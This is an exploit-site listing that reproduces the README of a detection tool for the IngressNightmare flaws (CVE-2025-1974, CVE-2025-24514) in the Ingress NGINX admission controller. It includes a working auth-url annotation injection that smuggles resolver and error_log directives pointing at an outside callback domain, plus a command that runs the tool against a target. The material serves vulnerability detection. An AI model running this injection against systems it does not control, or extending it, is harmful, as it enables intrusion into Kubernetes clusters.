Exploit for CVE-2025-1974 CVE-2025-1974 CVE-2025-24514

Name: Exploit for CVE-2025-1974 CVE-2025-1974 CVE-2025-24514
Rating: 5 (92 reviews)
2025-03-26 | CVSS 9.8
## https://sploitus.com/exploit?id=D80A6F6B-36AD-5AF9-9911-FD8E8DCA059D
# IngressNightmare Detection Tool

## Overview

This tool provides a non-intrusive detection capability for the IngressNightmare vulnerability chain ([CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974)) affecting Ingress NGINX Controller. It specifically leverages the auth-url annotation injection vector ([CVE-2025-24514](https://nvd.nist.gov/vuln/detail/CVE-2025-24514)) to verify the presence of this critical vulnerability without executing arbitrary code.

## Technical Background

The IngressNightmare vulnerability chain allows attackers to inject arbitrary NGINX configuration directives through various Ingress annotation fields. When these malicious Ingress resources are processed by the admission controller, the injected directives are evaluated during the NGINX configuration validation phase (`nginx -t`).

This PoC specifically exploits the `auth-url` annotation vulnerability by injecting the `error_log` directive with a syslog server pointing to an attacker-controlled domain. During configuration validation, NGINX will:

1. Parse the injected configuration
2. Resolve the specified domain via DNS

This DNS resolution activity provides a reliable signal that the target is vulnerable without requiring code execution or service disruption.

## Usage

1. Establish a DNS callback listener using Burp Collaborator, interactsh, or any DNS monitoring service.

2. Execute the detection tool:
   ```
   $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
   ```

3. If vulnerable, you will observe DNS resolution attempts to your DNS callback domain:

![poc](./poc.png)

## Detection Methodology

The tool crafts a specially formed AdmissionReview object containing an Ingress resource with the following injection payload:

```
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"
```

This payload:
- Uses the comment character (`#`) to terminate the URL
- Injects a newline followed by a resolver directive
- Adds the `error_log` directive with syslog pointing to the DNS callback domain
- Comments out the remainder to maintain syntactic validity

When processed by a vulnerable admission controller, this results in an outbound DNS lookup that confirms the presence of the vulnerability.

## Limitations

This tool only detects the presence of the vulnerability and does not attempt to exploit it for arbitrary code execution.

## Credits

https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities